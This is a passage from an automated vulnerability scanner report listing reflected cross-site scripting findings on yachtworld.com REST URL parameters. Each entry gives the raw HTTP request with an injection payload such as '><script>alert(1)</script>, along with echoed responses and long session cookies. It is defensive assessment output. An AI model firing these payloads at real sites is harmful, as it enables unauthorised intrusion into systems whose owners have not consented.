P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Sea+Ray/113469"><script>alert(1)</script>951e3c34935/A-1">
...[SNIP]...

3.279. http://www.yachtworld.com/boats/category/type/Silverton/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Silverton/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34cb2"><a>be23b373d69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type34cb2"><a>be23b373d69/Silverton/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:14 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type34cb2"><a>be23b373d69/Silverton/1">
...[SNIP]...

3.280. http://www.yachtworld.com/boats/category/type/Silverton/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Silverton/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95307"><a>26562a34325 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Silverton95307"><a>26562a34325/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:21 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Silverton95307"><a>26562a34325/A-1">
...[SNIP]...

3.281. http://www.yachtworld.com/boats/category/type/Silverton/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Silverton/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efab2"><script>alert(1)</script>8f5b9752a51 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Silverton/1efab2"><script>alert(1)</script>8f5b9752a51 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:28 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Silverton/1efab2"><script>alert(1)</script>8f5b9752a51/A-1">
...[SNIP]...

3.282. http://www.yachtworld.com/boats/category/type/Tartan/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Tartan/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1278"><script>alert(1)</script>e5cfe162772 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/typea1278"><script>alert(1)</script>e5cfe162772/Tartan/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:25 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/typea1278"><script>alert(1)</script>e5cfe162772/260+Cruiser">
...[SNIP]...

3.283. http://www.yachtworld.com/boats/category/type/Tartan/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Tartan/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a56"><a>554c131fe8c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Tartanb6a56"><a>554c131fe8c/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

3.284. http://www.yachtworld.com/boats/category/type/Tiara/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Tiara/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9545"><a>c24817267c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

